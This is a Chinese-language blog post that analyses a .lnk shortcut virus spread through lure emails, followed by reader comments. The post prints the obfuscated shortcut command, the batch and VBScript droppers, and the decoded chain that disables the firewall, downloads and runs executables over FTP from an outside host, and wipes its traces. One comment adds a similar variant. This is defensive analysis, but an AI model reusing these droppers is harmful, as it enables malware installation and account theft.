.lnk捷徑檔病毒

最近我同學跟我說她的電腦中毒了,我要她把病毒傳給我,所以我才能知道是什麼樣的病毒

跟據她傳來的檔案,很有趣的是,我在今年一月份也有收過類似的病毒信,也有寫了一篇簡單的介紹 : 病毒的花招 捷徑檔,我也有找到一篇文章是在介紹這種病毒

文章連結 : %Lnkget%

而到了現在,這樣的手法似乎有增無減,病毒的形式也有所變化,但是都有明顯的特點,信件內容都是繁體中文的,而主機、域名之類的都是來自中國大陸或台灣,在這背後有集團在運作,他的信件內容是這些

現在還在講露股溝妹ㄉ股溝妹已經落伍了~
告訴你瞎瞇叫蟑螂妹~
蟑螂妹
露後臀溝有什麼好大驚小怪ㄉ !
現在日本都已經在露前蟑螂鬚….實在有夠不雅ㄉ

而附加檔案是一個壓縮檔,裡面包著一個捷徑檔

virus_01

對於一般人而言,對這種東西沒什麼警覺性,一般人都只知道.exe之類的很危險,可是這病毒用的是.lnk,而且他又可以設定看起來相關的圖示,加上內容吸引人,各式各樣的內容都有,有的說是照片,有的說是援交妹,甚至有些說”如何防止帳號被盜”,各種聳動或是引誘使用者去點擊的內容都有,但是一但你點了,下場自然就很慘,你的帳號可能會被盜走用來賣掉或偷偷登入來幹壞事,他可能會自動寄類似”我是援交妹,提供全套服務”或是其它類似的內容給你msn或其它網站裡的所有聯絡人,而那些人開了,又會再次的把病毒散播出去,中毒的人肯定會很困擾,以下是一些研究與分析

捷徑檔內容

virus_02

捷徑檔的內容,像我在一月看到的一樣,是下載惡意程式來執行用的指令,有趣的是他還把視窗的大小以及字形設成最小來避免使用者發現,不同於一月的版本,在這次的版本中,他加了大量的替換變數,來讓指令非常難讀,除此之外,也可能是為了逃避防毒軟體的偵測

他的捷徑目標如下

%ComSpec% /c set q= t t.v&set a=z.c&set p=p.g&set h=p -s:z&set n=echo &echo %n%o ft%p%03%a%om^>z>j&echo %n%aa33^>^>z>>j&echo %n%bb33^>^>z>>j&echo %n%get%q%bs^>^>z>>j&echo %n%bye^>^>z>>j&echo ft%h%>>j&echo start t.vbs>>j&ren j s.bat&call s.bat&

經由整理後它的內容如下

echo echo o ftp.g03z.com^>z>j
echo echo aa33^>^>z>>j
echo echo bb33^>^>z>>j
echo echo get t t.vbs^>^>z>>j
echo echo bye^>^>z>>j
echo ftp -s:z>>j
echo start t.vbs>>j
ren j s.bat
call s.bat

簡單的來說,產生s.bat這個檔案並執行,而s.bat的檔案內容如下

s.bat:

echo o ftp.g03z.com>z
echo aa33>>z
echo bb33>>z
echo get t t.vbs>>z
echo bye>>z
ftp -s:z
start t.vbs

而這個s.bat又會去同一個ftp伺服器裡下載t.vbs這個檔案,然後執行

t.vbs:

sub k
for i=1 to UBound(s)
r=r&chr(s(i)-678)
next
Set kk = CreateObject(“Wscript.Shell”)
kk.run r,1
end sub
s=array(691,777,787,778,710,725,777,710,788,779,794,710,793,794,789,790,710,793,782,775,792,779,778,775,777,777,779,793,793,716,779,777,782,789,710,789,710,797,797,797,724,781,726,729,800,724,777,789,787,740,783,724,783,716,779,777,782,789,710,775,775,729,729,740,740,783,724,783,716,779,777,782,789,710,776,776,729,729,740,740,783,724,783,716,779,777,782,789,710,792,779,777,796,710,778,710,778,724,779,798,779,740,740,783,724,783,716,779,777,782,789,710,776,799,779,740,740,783,724,783,716,780,794,790,710,723,793,736,783,724,783,716,778,779,786,710,783,724,783,716,778,724,779,798,779,716,779,777,782,789,710,789,710,797,797,797,724,781,726,729,800,724,777,789,787,740,795,724,795,716,779,777,782,789,710,775,775,729,729,740,740,795,724,795,716,779,777,782,789,710,776,776,729,729,740,740,795,724,795,716,779,777,782,789,710,781,779,794,710,793,710,793,724,779,798,779,740,740,795,724,795,716,779,777,782,789,710,776,799,779,740,740,795,724,795,716,780,794,790,710,723,793,736,795,724,795,716,793,724,779,798,779,716,778,779,786,710,795,724,795,716,778,779,786,710,741,724,796,776,793,716,778,779,786,710,793,724,779,798,779,710,778,724,779,798,779,716,793,794,775,792,794,710,782,794,794,790,736,725,725,776,795,799,724,799,775,782,789,789,724,777,789,787,724,794,797,725,716,778,779,786,710,741,710,741,724,776,775,794)
k

它把要執行的指定ascii加過了678放在陣列s中,然後用vbs將指令還原就變成了這樣:

cmd /c net stop sharedaccess&echo o www.g03z.com>i.i&echo aa33>>i.i&echo bb33>>i.i&echo recv d d.exe>>i.i&echo bye>>i.i&ftp -s:i.i&del i.i&d.exe&echo o www.g03z.com>u.u&echo aa33>>u.u&echo bb33>>u.u&echo get s s.exe>>u.u&echo bye>>u.u&ftp -s:u.u&s.exe&del u.u&del ?.vbs&del s.exe d.exe&start http://buy.yahoo.com.tw/&del ? ?.bat

經整理過後

net stop sharedaccess
echo o www.g03z.com>i.i
echo aa33>>i.i
echo bb33>>i.i
echo recv d d.exe>>i.i
echo bye>>i.i
ftp -s:i.i
del i.i
d.exe

echo o www.g03z.com>u.u
echo aa33>>u.u
echo bb33>>u.u
echo get s s.exe>>u.u
echo bye>>u.u
ftp -s:u.u
s.exe

del u.u
del ?.vbs
del s.exe d.exe
start http://buy.yahoo.com.tw/
del ? ?.bat

經過了這又臭又長的繞這麼一大圈,在這次下載了d.exe和s.exe才是真正的病毒,兩個檔案並執行,然後刪除之前下載的所有東西,為什麼需要兩個檔案,這點我還沒有研究,接著它會開啟Yahoo! 奇摩拍賣的首頁,我猜他是想讓使用者輸入帳號密碼登入Yahoo!奇摩拍賣,然後先前裝好的病毒在一旁側錄帳號密碼,合理地懷疑,這病毒的目的可能是想偷Yahoo!奇摩拍賣的帳號,然後賣給詐騙集團,又或著這背後的集團本身就是詐騙集團,但也有可能只是想混淆視聽而已

之所以要繞這麼大一圈,我想其目的可能是想避免被研究,而最有趣的地方在於,他們都一直登入一個FTP主機,我們就來研究看看這到底是哪裡來的主機

來源的研究

註冊商 WHOIS 主機 : whois.paycenter.com.cn

The Data in Paycenter’s WHOIS database is provided by Paycenter
for information purposes, and to assist persons in obtaining
information about or related to a domain name registration record.
Paycenter does not guarantee its accuracy. By submitting
a WHOIS query, you agree that you will use this Data only
for lawful purposes and that,
under no circumstances will you use this Data to:
(1) allow, enable, or otherwise support the transmission
of mass unsolicited, commercial advertising or solicitations
via e-mail (spam); or
(2) enable high volume, automated, electronic processes that
apply to Paycenter or its systems.
Paycenter reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by this policy.

Domain Name : g03z.com
PunnyCode : g03z.com
Creation Date : 2009-01-08 16:50:39
Updated Date : 2009-01-08 16:50:39
Expiration Date : 2010-01-08 16:50:21

Registrant:
Organization : ggg zzz
Name : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234

Administrative Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86–02586883333
Fax : 86–02586883333
Email : web (a) zgsj.com

Technical Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86–02586883333
Fax : 86–02586883333
Email : web (a) zgsj.com

Billing Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86–02586883333
Fax : 86–02586883333
Email : web (a) zgsj.com

能得到的就只有是中國註冊的訊息,所有聯絡資料都是亂打的,當然要註冊網域來幹壞事應該沒有人蠢到會寫自己的聯絡資料上去,接著是主機的位置,解析後是

202.153.172.43

經由whois的資料可以發現,是台灣公司的主機

inetnum: 202.153.160.0 – 202.153.207.255
netname: UNIGATENET
descr: UnigateNet, Internet Service Provider,
descr: Taipei, Taiwan, R.O.C
country: TW
admin-c: FC159-AP
tech-c: CG195-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-TW-UNIGATE
remarks: This object can only be modified by APNIC hostmaster
remarks: If you wish to modify this object details please
remarks: send email to hostmaster (at) apnic.net with your organisation
remarks: account name in the subject line.
status: ALLOCATED PORTABLE
changed: hm-changed (at) apnic.net 20031024
changed: hm-changed (at) apnic.net 20060117
source: APNIC

person: Felix Chou
address: Chief Telecom Inc.
address: No.250, Yuang Guang St.,
address: Neihu Chiu, Taipei 114,
address: Taiwan, R.O.C.
country: TW
phone: +886-2-2657-6688
fax-no: +886-2-2797-2998
e-mail: felix (at) chief.com.tw
nic-hdl: FC159-AP
mnt-by: MAINT-TW-UNIGATE
changed: noah (at) chief.com.tw 20020715
changed: mark_lin (at) chief.com.tw 20060127
source: APNIC

person: Chief Group
address: UniGate Telecom Inc.
address: No.250, Yuang Guang St.,
address: Neihu Chiu, Taipei 114,
address: Taiwan, R.O.C.
country: TW
phone: +886-2-2657-6688
fax-no: +886-2-2657-6460
nic-hdl: CG195-AP
e-mail: felix_chou (at) chief.com.tw
e-mail: mark_lin (at) chief.com.tw
e-mail: apnic_admin (at) chief.com.tw
changed: mark_lin (at) chief.com.tw 20070521
mnt-by: MAINT-TW-UNIGATE
source: APNIC

看起來是一家叫是方電訊的公司,他有提供IDC的服務,另一個公司叫領航電信,不太清楚他們之間是什麼關係,不過看起來應該是被入侵的,直接連到http://202.55.242.9/也是領航電信的網頁,應該沒有笨蛋會拿自己的公司主機來幹壞事,諷刺的是,是方電訊的首頁擺了什麼資安碉堡防護系列的產品,而領航電信的網頁,下面有排跑馬燈這樣寫著

間碟軟體對電腦使用者之危害及影響宣導:為防止不肖人士利用間碟軟體竊取格人資料, 請網際網路接取用戶注意間碟軟體對於電腦使用的危害及影響.

嘖嘖,一個被入侵了還在賣資安產品,一個還提醒別人間諜軟體的危害,都不知道自己變成了幫兇….,我有找到其它提到這些資料的討論,他們說都已經回報了這些公司,不過到了今天一樣還在幫忙散播病毒,真不知道這些公司到底在幹什麼的,開著主機讓人散播病毒

最後

我相信在這背後的集團肯定跟詐騙集團有關係,這些.lnk病毒的風格和行為都大同小異,都同樣會透過信件以誘人開啟的內容散播,而且都是以盈利目的,其目的都是為了盜取遊戲的帳號密碼,或是盜取網拍帳密,偷走網拍資料,來供詐騙集團有訂單等資料讓受害者取信

我有想過如何不讓這種事情發生,例如試著攻擊那些提供病毒檔讓人下載的主機,讓他沒有辦法運作,但是安全性是0分的機器何其多,而像上文列出這些公司,不負責任把自己伺服器安全弄好的公司也很多,即使某個伺服器的服務被我阻斷了,在這背後的集團只要換一個伺服器就可以繼續犯案,而指望台灣或是中國大陸能逮到這些人大概也遙遙無期,中國大陸可是網路犯罪的天堂,所以最好的方法還是使用者要知道這些基本的知識,這是所有使用者的責任,為了你點開了病毒把病毒散播出去,可能某個人就因此這輩子的積蓄就此被騙光,你也是幫兇之一,因此,在這個騙子橫行的年代,要有基本的警覺,接著我會寫一篇文章來告訴大家一些基本該知道的知識

This entry was posted in 中文文章, 病毒 and tagged , , . Bookmark the permalink.

9 Responses to .lnk捷徑檔病毒

  1. 路過 says:

    跟是方應該沒關係 主要是領航電信被入侵 是方只是提供IDC服務

  2. Aitjcize says:

    這篇分析實在太強大了!!

  3. 藍教頭 says:

    nice artical

  4. Hans says:

    寫這種文章可以寫的很不錯,
    可是跟你的備審怎差那麼多…-.-

  5. noname says:

    s.bat這個檔案是由指令所產生的並不是到FTP下載的

  6. victor says:

    感謝你,的確是寫錯了,已修正

  7. 123 says:

    所以勒? 中毒了該怎麼辦???

  8. 頭又大 says:

    請問,我執行到一個病毒,名為”檢討報告.lnk”
    我仿照你的格式整理如下:
    %COMSPEC% /C
    SET F=O MO56N&
    ECHO %A%%F%Y0M%G%^>Z>C&
    ECHO %A%123^>^>Z>>C&
    ECHO %A%123^>^>Z>>C&
    ECHO %A%GET C C.VBS^>^>Z>>C&
    ECHO %A%BY^>^>Z>>C&
    SET G=.COM&
    ECHO %B%P%S%S:Z>>C&
    ECHO %O%ART C.VBS>>C&
    SET S= -&
    SET B=FT&
    SET A=ECHO &
    REN C Y.BAT&
    SET O=ST&
    Y.BAT&

    請問我應該要注意哪方面的問題呢,Trend Micro沒掃到病毒…
    請高手解惑阿…

  9. 太厲害啦 says:

    好詳細的解說啊
    2009 年 10 月 03 日 by victor
    晚了兩年多才看到這篇…Orz
    感謝你